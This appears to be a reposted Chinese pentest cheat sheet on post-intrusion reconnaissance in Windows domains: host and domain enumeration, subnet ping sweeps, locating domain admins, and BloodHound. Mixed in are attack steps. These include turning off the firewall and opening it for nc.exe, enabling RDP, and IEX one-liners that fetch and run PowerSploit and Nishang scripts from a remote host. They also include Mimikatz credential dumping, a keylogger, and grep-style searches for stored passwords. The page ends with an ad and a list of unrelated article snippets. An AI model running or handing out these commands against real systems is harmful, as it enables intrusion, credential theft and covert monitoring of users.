内网渗透实战笔记:信息收集命令快速参考手册​

收藏必备!内网渗透信息收集完全指南:从机器角色判断到域管理员定位

本文全面介绍内网渗透测试中的信息收集技术,包括判断机器所处网络区域及角色、本机信息收集(操作系统、权限、服务等)、域环境信息收集(判断域存在、解析域名等)、存活主机扫描方法(nbtscan、ping等)、域管理员定位技术(psloggedon、PowerView等)以及使用BloodHound进行域分析。文章提供了大量实用命令和工具,帮助渗透测试人员系统掌握内网环境信息收集技术,为后续渗透奠定基础。


介绍

当我们通过渗透进入内网环境后,面对的是一片未知区域。需要对当前机器角色判断,对机器所处区域分析。

判断当前机器区域

判断机器所处于网络拓扑哪个区域,是在DMZ区、办公区核心区。区域界限是相对的

机器角色判断

本机信息收集

包括操作系统、权限、内网IP段、杀软、端口、服务、补丁情况、网络连接、共享、会话等。如果是域内主机,那么操作系统、应用软件、补丁、服务、杀软一般都是批量安装的。文件共享/FTP连接记录、浏览器访问记录、mstsc连接记录、ssh连接记录。

查询网络配置信息。进行IP地址段、端口、arp记录内网段信息收集

ipconfig /all && netstat -ano && arp -a

查看当前系统版本

wmic OS get Caption,CSDVersion,OSArchitecture,Version

查看体系结构

echo %PROCESSOR_ARCHITECTURE%

查询操作系统及软件信息

systeminfo | findstr /B /C:”OS Name” /C:”OS Version” ## 英文系统 systeminfo | findstr /B /C:”OS 名称” /C:”OS 版本” ## 中文系统

查看.net framework版本

reg query “HKLM\Software\Microsoft\NET Framework Setup\NDP” /s /v version | findstr /i version | sort /+26 /r

查看补丁列表

systeminfo

查看补丁的名称、描述、ID、安装时间等

wmic qfe get Caption,Description,HotFixID,InstalledOn

PowerShell收集软件的版本信息

powershell “Get-WmiObject -class Win32_Product |Select-Object -Property name, version”

查看安装的软件的版本、路径等

wmic product get name, version

查看软件比较靠谱的做法是将远程加载本地ps文件,cs中可以使用powershell-import,上传ListInstallProgram.ps1后输入

powershell Get-list

将文件放到靶机,本地加载也可以

shell powershell -exec bypass -Command "& {Import-Module 'C:\Users\HackerQWQ\Desktop\ListInstalledProgram.ps1';Get-list}"

查看当前用户权限

whoami && whoami /priv

查询本机服务信息

wmic service list brief

查看开启的服务

net start

wmic查询进程信息

wmic process list brief

查看进程

tasklist /svc

查看启动程序信息

wmic startup get command,caption

查看计划任务(需要高权限)

at(win10之前) schtasks /query /fo LIST /v(win10之后)

查看主机开机时间

net statistics workstation

查看本机用户列表

net user

获取本地管理员信息

net localgroup administrators

查看当前在线用户

query user || qwinsta

查看在线用户

quser

列出或断开本地计算机与所连接的客户端的对话(需要高权限)

net session

查询端口列表

Windows: netstat -ano linux: netstat -tnlp

查看本机共享列表和可访问的域共享列表

net share (445端口)

查找共享列表

wmic share get name,path,status

磁盘映射

net use k: \192.168.1.10\c$

查询路由表

route print

可用接口的ARP缓存表。局域网内arp -a,查看是否有重复的mac地址判断是否存在arp欺骗。服务器绑定mac地址方式防止arp欺骗

arp -a

查看远程连接信息

cmdkey /l

查看杀软

WMIC /Node:localhost /Namespace:\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List

查看本地密码策略

net accounts

查看hosts文件:

linux:cat /etc/hosts windows:type c:\Windows\system32\drivers\etc\hosts

查看dns缓存

ipconfig /displaydns

常见查毒软件进程

tasklist /svc

随后将结果放到avList中对比查看

进程软件名称
360SD.EXE360杀毒
360TRAY.EXE360实时保护
ZHUDONGFANGYU.EXE360主动防御
KSAFETRAY.EXE金山卫士
SAFEDOGUPDATECENTER.EXE服务器安全狗
MCAFEE MCSHIELD.EXE迈克菲杀毒软件
EGUI.EXENOD32
AVP.EXE卡巴斯基
AVGUARD.EXE小红伞
BDAGENT.EXEBITDEFENDER

可以用avList自动判断,项目地址:https://github.com/gh0stkey/avList

浏览器信息收集

项目地址:https://github.com/moonD4rk/HackBrowserData

image-20220731162608183

域环境信息收集

判断是否存在域

ipconfig /all可查看网关IP地址、DNS的IP地址、域名、本机是否和DNS服务器处在同一网段等。

image-20211220011528899

解析域名ip

通过反向解析查询命令nslookup来解析域名的IP地址,用解析到的IP地址进行对比,判断域控服务器和DNS服务器是否在同一台机器上

image-20211220011610591

查看当前权限

whoami

获取域SID

whoami /all

查询指定用户的详情信息

net user xxx /domain

查看域内所有账号

net user /domain

对比查看”域(域名)”和”登录服务器(域控制器)”的信息是否匹配

systeminfo

对比查看”工作站域DNS名称(域名)”和”登录域(域控制器)”的信息是否相匹配

net config workstation

查看时间可以找到域控

net time /domain

查看域密码策略

net accounts /domain

查看当前登录域

net config workstation

查看域用户

net user /domain

登录本机的域管理员

net localgroup administrators /domain

获取域控ip

ping -a xxx.com

查询域

net view /domain

查询域内的所有计算机

net view /domain:HACHE

查询域的所有组(enterprise admins组权限最大)

net group /domain

SPN扫描

setspn -T domain -q/

查看域管理员的用户组

net group “domain admins” /domain

查询域系统管理员用户组

net group “Enterprise admins” /domain

查看域控制器

net group “domain controllers” /domain

查看域控制器的机器名

nltest /DCLIST:hacke

查看dns缓存

ipconfig /displaydns

列域控c盘文件(需要域管理员权限)

dir \WIN-75NA0949GFB.safe-duck.com\c$

查询所有域成员计算机列表

net group “domain computers” /domain

获取域信任信息

nltest /domain_trusts

获取域内用户的详细信息

wmic useraccount get /all

查看存在的用户

dsquery user

查询所有计算机名称

dsquery computer

攻击主机CMD扫描同网段存活ip

windows

# 扫c段 for /L %P in (1,1,254) DO @ping ‐w 1 ‐n 1 192.168.1.%P | findstr "TTL ="

Linux

#!/bin/bash NET=10.168.1. for IP in {100..115} do if `ping -c2 -i0.2 -w2 $NET$IP &> /dev/null` then echo -e "$NET$IP is \033[31mup\033[0m" else echo -e "$NET$IP is \033[32mdown\033[0m" fi done

扫b段

for i in 192.168.{1..254}.{1..254}; do if ping -c 3 -w 3 $i &>/dev/null;then echo $i is alived; fi; done

PowerView.ps域内信息收集

Invoke-NetView //查域内环境 Invoke-ShareFinder //查共享目录 Invoke-MapDomainTrusts //查看域内信任关系 Get-NetLocalGroup -HostName TARGET(主机名) //查看指定用户的登录时间、所属组情况

cs信息收集

target组信息的命令

net group \Target net localgroup \target 组名

获取远程目录

shell dir \target\c

\users //递归获取多级目录及文件

cs通过powershell命令获取目录信息

powersehll Invoke-Command -ComputerName target -ScriptBlock{dir c:} powershell Invoke-Command -ComputerName target -ScriptBlock{net localgroup administrators}

cs通过mimikatz抓取远程哈希值

powershell-import Invoke-Mimikatz.ps1 powershell Invoke-Mimikatz -DumpCreds powershell Invoke-Mimikatz -Command ‘“privilege::debug” “sekurlsa::logonPasswords full”‘

防火墙相关

  1. 关闭防火墙

    Windows Server 2003及之前的版本(admin):

    netsh firewall set opmode disable

    Windows Server 2003之后的版本(admin):

    netsh advfirewall set allprofiles state off
  2. 查看防火墙配置:

    netsh firewall show config

    20210402114218

  3. 修改防火墙配置

    Windows Server 2003及之前的版本,允许指定程序全部连接:

    netsh firewall add allowedprogram c:\nc.exe "allow nc" enable

    Windows Server 2003之后的版本,情况如下。

    允许指定程序进入:

    netsh advfirewall firewall add rule name="pass nc" dir=in action=allow program="C:\nc.exe"

    允许指定程序退出:

    netsh advfirewall firewall add rule name="Allow nc" dir=out action=allow program="C:\nc.exe"

    允许3389端口放行:

    netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

    自定义防火墙日志的储存位置

    netsh advfirewall set currentprofile logging filename "C:\windows\temp\fw.log"

查询代理配置情况

reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"

20210402114228

查询并开启远程连接服务

  1. 查看远程连接端口

    0xd3d转换后就是3389

    REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /V PortNumber
  2. 在Windows Server 2003中开启3389端口

wmic path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1
  1. 在Windows Server 2008和Windows Server 2012中开启3389端口
wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1 wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName='RDP-Tcp') call setuserauthenticationrequired 1 reg add "HKLM\SYSTEM\CURRENT\CONTROLSET\CONTROL\TERMINAL SERVER" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

端口扫描

telnet端口连接

没有开启的话去“打开或关闭windows功能”开启

telnet <主机> <端口> telnet 192.168.52.138 445
PowerSploit 中的Invoke-portscan.ps1脚本

下载地址:https://github.com/PowerShellMafia/PowerSploit

端口扫描利用到工具包中的Portscan.ps1

powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://39.xxx.xxx.210/powersploit/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts 192.168.1.1/24 -T 4 -ports '445,1433,8080,80,3389'" // 或者扫描全部的端口:-Ports "1-65535"

image-20211229003834739

Nishang中的Invoke-portscan.ps1

下载地址:https://github.com/samratashok/nishang

该脚本可用于发现主机、解析主机名、扫描端口。

powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://39.xxx.xxx.210/nishang/Scan/Invoke-PortScan.ps1');Invoke-PortScan -StartAddress 192.168.1.1 -EndAddress 192.168.1.255 -ResolveHost -Port '1-65535'" // -ResolveHost:解析主机名

image-20211229004647052

Nmap扫描

一般通过挂代理,nmap远程扫描

《内网渗透测试:隐藏通讯隧道技术》

Metasploit 端口扫描模块

Metasploit中提供了很多内置的扫描模块,使用方便,在侵入内网后设置好路由直接扫即可,有时速度有些慢。几个常用的:

auxiliary/scanner/portscan/tcp auxiliary/scanner/portscan/tcp auxiliary/scanner/portscan/ack
收集域内端口的banner信息

banner信息表示“欢迎语”,其中会包含一些敏感信息,在banner信息中,可以获取到软件开发商、软件名称、服务类型、版本号等,而版本号信息有时会存在公开的CVE可以利用。获取到版本号后,可以在中查找到对应的CVE编号,并在ExploitDB等平台上面找到相关的利用方式。

使用Nmap获取banner
nmap <IP地址> --script=banner -p <端口/端口范围>

img

使用nc获取banner
nc -nv <IP地址> <端口>

img

存活主机扫描

nbtscan

nbtscan.exe是一个命令行工具,用于扫描本地或远程TCP/IP网络上的开放NetBIOS名称服务器。

下载地址:https://github.com/MrAnonymous-1/nbtscan

将nbtscan.exe上传到目标主机上,然后直接输入ip段即可运行扫描:

//扫描一个网段 nbtscan.exe 192.168.1.0/24 //扫描两个网段 nbtscan.exe 192.168.1.0/24 192.168.2.0/24

image-20220102212911598

参数解释:

ping

基于icmp扫描内网

for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.52.%I | findstr "TTL=" //兼容win7 for /l %i in (1,1,254) do @ping -a 10.0.1.%i -w 1 -n 1 | find /i "Ping" //扫b段 for /l %i in (1,1,254) do @ping -a 10.0.%i.1 -w 1 -n 1 | find /i "Ping"

image-20220102210052830

arp-scan.exe

基于arp协议来进行存活性扫描

项目地址:https://github.com/QbsuranAlang/arp-scan-windows-

image-20220102223533890

批处理脚本

这个批处理文件可用于对内网工作组和域内存活主机进行简单的扫描探测,并且支持中英文操作系统。

@echo off @echo. @FOR /F "usebackq delims=, " %%J IN (`net view /domain ^|find "命令成功完成" /v ^|find "The command completed successfully." /v ^|find "命令成功完成" /v ^|find "--" /v ^|find "Domain" /v ^|find "" /v ^|find "コマンドは正常に終了しました" /v /i`) do ( @echo ====== Domain:%%J ========= @FOR /F "usebackq eol=; delims=, " %%i in (`net view /domain:%%J ^|findstr "\\"`) do ( @FOR /F "usebackq eol=; tokens=1,2,3* delims=\\" %%a in (`@echo %%i`) do ( ping %%a -4 -n 1 -w 100 |find /i "ping" > %%a.txt @FOR /F "tokens=2 delims=[]" %%b in (%%a.txt) do @echo \\%%a = [%%b] @del /f /q %%a.txt ))) @echo ====== Getting IP Complete ======
msf主机存活扫描
auxiliary/scanner/discovery/udp_sweep auxiliary/scanner/discovery/udp_probe auxiliary/scanner/netbios/nbname

MSF建立会话拿到shell,即可直接执行DOS命令至今进行信息收集。也可以进行直接执行run winenum可以一键收集记录。

run winenum

定位域管理员

psloggeddon.exe

下载地址:https://docs.microsoft.com/en-us/sysinternals/downloads/psloggedon

psloggedon.exe可以查看本地登陆的用户和通过本地计算机或远程计算机资源登陆的用户。如果指定的是用户名而不是机器名,psloggedon.exe会搜索网上邻居中的所有计算机,并显示该用户是否已经登录。该工具的某些功能需要管理员权限。

psloggedon.exe [-] [-l] [-x] [\\computername或username]

查看DC(域控)登录过的机器

PsLoggedon64.exe -accepteula \\DC

image-20220102224228793

查看本地登录的用户

PsLoggedon64.exe -accepteula

image-20220102224301966

查看指定用户登录的计算机

PsLoggedon64.exe -accepteula Administrator

image-20220102224406477

PVEFindADUser.exe

下载地址:https://www.corelan.be/index.php/my-free-tools/ad-cs/pve-find-ad-user/

PVEFindADUser.exe 可用于查找活动目录用户登陆的位置、枚举域用户,以及查找在特定计算机上登陆的用户,包括查找本地用户。通过RDP远程桌面登陆的用户、通过运行服务和计划任务的用户。运行该工具需要计算机配置**.NET Framework 2.0 环境**,并需要有**管理员权限**。

PVEFindADUser.exe <参数>

我们一般直接运行pvefinaduser.exe -current命令,即可显示域中所有计算机上当前登陆的所有用户。

image-20220102225301609

显示指定用户登录的计算机

current[“username”]如果仅指定了-current参数,将获取目标计算机上当前登录的所有用户。如果指定了用户名(Domain\Username),则显示该用户登陆的计算机
PVEFindADUser.exe -current redteam.org\dc //PVEFindADUser.exe -current domain\username

image-20220102225446676

powerview.ps1

powerview脚本可以用来获取当前域管理员在线登录的服务器,其依赖powershell和wmi,在powersploit工具包中,是一个收集域信息很好用的脚本。

如下,可以看到本地域有一个域管理员:

我们通过Invoke-UserHunter(等于Invoke-UserHunter -CheckAccess)来定位他们:

powershell.exe -exec bypass IEX(New-Object Net.WebClient).DownloadString('http://39.xxx.xxx.210/powersploit/Recon/PowerView.ps1');Invoke-UserHunter

详情请执行Get-Help Invoke-UserHunter命令查看,具体使用方法与前两个相似,它可以找到域内特定的用户群,接受用户名、用户列表和域组列表查询,接受一个主机列表或查询可用的主机域名。一切都是灵活的,让你自己定义找寻谁,在哪里找。

获取指定用户在线机器:

img

Empire信息收集

# 查看本机用户、域组成员、密码设置时间、剪贴板内容、系统基本信息、网络适配器信息、共享信息等 usemodule situation_awareness/host/winenum # 目标主机事件日志、应用程序控制策略日志、RDP登录信息、PowerShell脚本运行和保存的信息等,需要管理员权限 usemodule situational_awareness/host/computerdetails

powersploit 信息收集

项目地址:https://github.com/PowerShellMafia/PowerSploit ,已经停止维护

建立会话后的meterpreter:

#加载模块 load powershell #调用本地ps脚本 powershell_import /usr/share/windows-resources/powersploit/Recon/xx.ps1 #命令执行 powershell_execute Get-NetDomain #获取当前的域名称 Get-NetDomain #返回所有域内成员的详细信息 Get-Netuser #获取所有的域内的控制器信息 Get-NetDomainController #获取所有域内机器的名称 Get-NetComputer #获取域内的所有的网络共享 Get-Netshare #获取指定服务的远程连接信息 Get-NetRDPSESSION #获取进程的详细信息 Get-NetProcess # 获取活动目录的信息 Get-ADOPJECT #判断用户是否登陆计算机且用户是否有管理员权限 invoke-processhunter

powersploit无文件攻击 将下载的文件放在vps上面。确保目标服务器可以访问:

如:http://xxx.com/PowerSplot/Recon/Invoke-Portscan.ps1

#在目标机导入脚本: iex(new-object net.webclient).downloadstring("http://192.168.1.4/PowerSploit/Recon/Invoke-Portscan.ps1") #扫描网段、端口 invoke-portscan -hosts 192.168.1.1/24 -ports "21,22,80,139,80,445" #invoke-mimikatz抓取hash iex(new-object net.webclient).downloadstring("http://192.168.1.4/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1") #导hash Invoke-Mimikatz -dumpcreds #get-keystrokes键盘记录 iex(new-object net.webclient).downloadstring("http://192.168.1.4/PowerSploit/Exfiltration/Get-Keystrokes.ps1") #将键盘记录保存到123.txt里面 Get-Keystrokes -logpath C:\Users\admin\123.txt

翻翻配置文件

一个正常的Web应用肯定有对应的数据库账号密码信息,可以使用如下命令寻找包含密码字段的文件:

findstr /s /m "password" *.* findstr /s /i /m /r "defineclass remoteserver" Web目录 \*.jsp # /r 表示正则,/s表示遍历子目录,/m表示不显示匹配

Linux查文件:

find Web应用目录 -iname "*.jsp*" | xargs egrep -l -i "classloader" |xargs egrep -l -i "cipher" find Web应用目录 -iname "*.php*" | xargs egrep -l -i "openssl_decrypt" |xargs egrep -l -i "file_get_contents"

敏感路径

%WINDIR% %WINDIR%\system32\ %TEMP% %LOCALAPPDATA% %APPDATA% C:\TEMP\ C:\Windows\Temp %UserProfile%\Downloads %UserProfile%\Recent C:\$Recycle.bin

常用应用的默认配置路径:

Tomcat: CATALINA_HOME/conf/tomcat-users.xml Apache: /etc/httpd/conf/httpd.conf Nginx: /etc/nginx/nginx.conf Wdcp: /www/wdlinux/wdcp/conf/mrpw.conf Mysql: mysql\data\mysql\user.MYD

还有一些Navicat,TeamViewer,FileZilla,WinSCP,Xmangager系列产品(Xshell,Xftp)的密码查看

项目: https://github.com/uknowsec/SharpDecryptPwd

BloodHound域分析工具

BloodHound通过图与线的形式,将域内用户、计算机、及相关用户等等之间的关系直观地展现在Red Team队员面前,帮助更快的梳理域内的情况。

配置
  1. 安装java

  2. 安装Neo4jServer Community

    https://neo4j.com/download-center/#community

    image-20220107001050290

    开启服务

    neo4j.bat console

    image-20220107001246254

    通过http://localhost:7474/broswer访问,账号密码neo4j/neo4j

    image-20220107001346092

  1. 下载BloodHound

    打开BloodHound.exe,输入账号密码(neo4j/123456)即可进入主页面

    image-20220126163803646

使用

通过上传SharpHound.exe运行命令

SharpHound.exe -c all

生成压缩包然后在BloodHound.exe的upload data导入数据

image-20220126181806426

可以选中一个节点查看node info

image-20220126181902426

也可以通过analysis中的一些预定义查询语句查询,如这里选用Find all Domain Admins查询结果

文章来自网上,侵权请联系博主

互动话题:如果你想学习更多网安方面的知识和工具,可以看看以下## 学习资源

如果你是也准备转行学习网络安全(黑客)或者正在学习,这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你

知识库由360智榜样学习中心独家打造出品,旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力,熟练掌握基础攻防到深度对抗。


1、知识库价值

深度: 本知识库超越常规工具手册,深入剖析攻击技术的底层原理与高级防御策略,并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等,提供了独到的技术视角和实战验证过的对抗方案。

广度: 面向企业安全建设的核心场景(渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营),本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点,是应对复杂攻防挑战的实用指南。

实战性: 知识库内容源于真实攻防对抗和大型演练实践,通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。

2、 部分核心内容展示

360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。

360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。

内容组织紧密结合攻防场景,辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合,是你学习过程中好帮手。

1、网络安全意识

2、Linux操作系统

3、WEB架构基础与HTTP协议

4、Web渗透测试

5、渗透测试案例分享

6、渗透测试实战技巧

7、攻防对战实战

8、CTF之MISC实战讲解

3、适合学习的人群

一、基础适配人群

  1. 零基础转型者‌:适合计算机零基础但愿意系统学习的人群,资料覆盖从网络协议、操作系统到渗透测试的完整知识链‌;
  2. 开发/运维人员‌:具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能,实现职业方向拓展‌或者转行就业;
  3. 应届毕业生‌:计算机相关专业学生可通过资料构建完整的网络安全知识体系,缩短企业用人适应期‌;

二、能力提升适配

1、‌技术爱好者‌:适合对攻防技术有强烈兴趣,希望掌握漏洞挖掘、渗透测试等实战技能的学习者‌;

2、安全从业者‌:帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力‌;

3、‌合规需求者‌:包含等保规范、安全策略制定等内容,适合需要应对合规审计的企业人员‌;

因篇幅有限,仅展示部分资料,完整版的网络安全学习资料已经上传CSDN,朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/1124923.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

deepcode国内使用教程

deepcode国内使用教程 本文面向国内网络环境/国内模型接口的使用场景&#xff0c;整理了从 GitHub 克隆 DeepCode 后&#xff0c;为了“能跑起来 更稳定 更快写代码进文件”需要做的关键修改点与原因。 说明&#xff1a;本文不会写入任何真实 API Key&#xff0c;请按自己的…

天文图像识别:星体、星云与人造卫星轨迹区分

天文图像识别&#xff1a;星体、星云与人造卫星轨迹区分 引言&#xff1a;从通用万物识别到专业天文图像解析 随着深度学习在计算机视觉领域的持续突破&#xff0c;通用图像识别技术已能实现对数千类日常物体的精准分类。阿里近期开源的「万物识别-中文-通用领域」模型&#xf…

从入门到精通域渗透攻防完整教程-域渗透实战指南

《【收藏级教程】域渗透完全指南&#xff1a;从基础到进阶的网络安全攻防手册》 本文全面介绍域渗透技术&#xff0c;涵盖Active Directory基础知识、信息收集方法、凭据获取与横向移动等攻击技术。详细解析PowerView、BloodHound、Mimikatz等工具应用及NTLM、LDAP、Kerberos协…

springboot基于vue的酒店客房预订推荐系统661n2sd8

目录系统概述技术架构功能模块智能推荐系统优势开发技术核心代码参考示例1.建立用户稀疏矩阵&#xff0c;用于用户相似度计算【相似度矩阵】2.计算目标用户与其他用户的相似度总结源码文档获取/同行可拿货,招校园代理 &#xff1a;文章底部获取博主联系方式&#xff01;系统概述…

大模型应用技术之 Agent框架 AutoGen

1. AutoGen 原理与介绍 1.1 什么是 AutoGen AutoGen 是由微软&#xff08;Microsoft&#xff09;开发的开源多智能体对话框架。它允许开发者通过定义多个可对话的 Agent&#xff08;Conversable Agents&#xff09;&#xff0c;让它们通过自动对话来协作解决任务。AutoGen 的核…

双向DC-DC Boost变换器系统滑模控制与非线性干扰观测器研究:PWM应用与波形复现EI期刊探讨

双向DC- DC&#xff0c;基于PWM的DC-DC Boost变换器系统中基于非线性干扰观测器的滑模控制&#xff0c;滑模控制SMC&#xff0c;扰动观测器NDOB。 EI期刊复现&#xff0c;各个波形与文章匹配。双向DC-DC转换器系统是一个在电力电子学领域广泛研究的课题&#xff0c;其中基于PWM…

MongoDB 远程连不上?用cpolar告别局域网束缚,跨网访问就这么简单

目录教程新鲜出炉&#xff0c;看下面&#x1f447;1. 安装Docker2. 使用Docker拉取MongoDB镜像3. 创建并启动MongoDB容器4. 本地连接测试5. 公网远程访问本地MongoDB容器5.1 内网穿透工具安装5.2 创建远程连接公网地址5.3 使用固定TCP地址远程访问MongoDB 是一款 NoSQL 数据库&…

渗透工程师必刷!2026年最常考的15道面试题(附答案)

网络安全工程师必看&#xff1a;15个实战漏洞解析与防护技巧(建议收藏) 本文是一份全面的网络安全技术指南&#xff0c;涵盖SQL注入、XSS/CSRF、XXE漏洞、Kerberos认证、权限提升、代码混淆、WAF绕过、EDR系统、SSL/TLS、二进制漏洞分析、AWS配置、Android逆向、钓鱼攻击、恶意…

渗透测试的8个步骤,一文详解(小白必看)!

【全网最全】渗透测试与入侵的区别&#xff1a;小白到网络安全高手的收藏指南 本文详细阐述了渗透测试与入侵的本质区别&#xff0c;前者是以安全为目标的合法测试&#xff0c;后者则是恶意获取系统权限的行为。文章系统介绍了学习渗透测试的八个阶段&#xff1a;网络基础、网…

MT键槽加工动力刀座

MT键槽加工动力刀座直接在车床上加工键槽&#xff0c;无需借助其他专用设备MT的拉削工具&#xff0c;与其他技术相比&#xff0c;可以在一个非常短的时间内实现键槽加工&#xff0c;而不需要在两台设备上加工完成&#xff0c;所有的加工都在一台车床上&#xff0c;因此&#xf…

基于Spring boot+Vue的大学生心理咨询平台_44ik50ky

目录基于Spring BootVue的大学生心理咨询平台开发技术核心代码参考示例1.建立用户稀疏矩阵&#xff0c;用于用户相似度计算【相似度矩阵】2.计算目标用户与其他用户的相似度总结源码文档获取/同行可拿货,招校园代理 &#xff1a;文章底部获取博主联系方式&#xff01;基于Sprin…

Baklib 2025 年度总结:AI 驱动的内容进化与平台实力强化

Baklib在过去一年中围绕 “AI 内容云” 架构的持续创新和能力扩展。Baklib 致力于用人工智能和先进的内容管理技术重塑企业内容数字化体验&#xff0c;为客户提供更高效、智能和可扩展的企业内容解决方案。全面提升平台核心能力&#xff1a;功能迭代与客户扩展在 2025 年&…

学术合规 “双 buff” 上线!虎贲等考 AI:降重 + 降 AIGC 同步清零,论文审核一次过

学术创作进入 “双重合规” 严审时代 —— 重复率超标直接驳回&#xff0c;AIGC 痕迹明显判定不合规&#xff0c;无数科研人、毕业生陷入两难&#xff1a;手动降重耗时耗力还逻辑混乱&#xff0c;普通工具改写易失真&#xff0c;AI 生成的优质内容因 “机器感” 无法通过审核&a…

内网渗透入门到精通:超详细实战教程,带你从小白变大神

网络安全攻防实战&#xff1a;内网渗透技术与防御策略&#xff0c;收藏级教程 本文系统介绍内网渗透技术全流程&#xff0c;包括环境搭建、信息收集、权限提升、横向移动和权限维持等关键环节&#xff0c;提供实战案例与代码示例。强调法律合规&#xff0c;提醒需获得授权&…

springboot_vue公司企业项目分配进度管理系统的设计与实现_60jjvqqg

目录摘要开发技术核心代码参考示例1.建立用户稀疏矩阵&#xff0c;用于用户相似度计算【相似度矩阵】2.计算目标用户与其他用户的相似度总结源码文档获取/同行可拿货,招校园代理 &#xff1a;文章底部获取博主联系方式&#xff01;摘要 该项目基于SpringBoot和Vue.js技术栈&am…

虎贲等考 AI:AI 驱动学术创作,全流程智能辅助新范式

在学术探索的征程中&#xff0c;从选题构思到答辩收官&#xff0c;科研工作者与学子常面临文献搜集繁琐、数据支撑薄弱、格式规范复杂、查重降重棘手等多重困境。虎贲等考 AI 作为一款基于前沿人工智能技术打造的专业论文写作辅助工具&#xff0c;以 “全流程覆盖、高专业保障、…

本地AI崛起!Ollama全家桶带你无损运行30+模型

一、Ollama 全家桶,开启本地 AI 新时代 在人工智能飞速发展的今天,大语言模型(LLMs)展现出了令人惊叹的能力,从智能聊天到内容创作,从代码生成到数据分析,其应用场景日益广泛。然而,许多强大的语言模型通常依赖云端服务,这不仅带来了隐私和数据安全方面的担忧,还可能…

内网渗透技术全解析:从Web入侵到域控获取的实战教程

【珍藏】内网渗透技术全解析&#xff1a;从Web入侵到域控获取的实战教程 本文详细介绍了内网渗透测试全流程&#xff0c;从Web服务器ThinkPHP漏洞利用开始&#xff0c;通过信息搜集、权限提升、凭证获取等技术&#xff0c;实现内网横向移动。文章展示了MSF框架使用、IPC连接、…

springboot基于vue的大学生兼职管理系统的设计与实现_dz2fko41

目录 系统概述技术架构核心功能模块创新与优化应用价值 开发技术 核心代码参考示例1.建立用户稀疏矩阵&#xff0c;用于用户相似度计算【相似度矩阵】2.计算目标用户与其他用户的相似度总结源码文档获取/同行可拿货,招校园代理 &#xff1a;文章底部获取博主联系方式&#xff0…

把Gemma 2B塞进手机:MNN端侧AI推理超详细指南

引言 在人工智能飞速发展的当下,端侧 AI 推理的重要性日益凸显。以往,AI 模型大多依赖云端服务器进行计算和推理,然而,这种模式存在着网络延迟高、数据隐私难以保障、带宽成本高以及对网络稳定性要求高等诸多问题。例如,在实时翻译场景中,云端推理的延迟可能导致对话的流…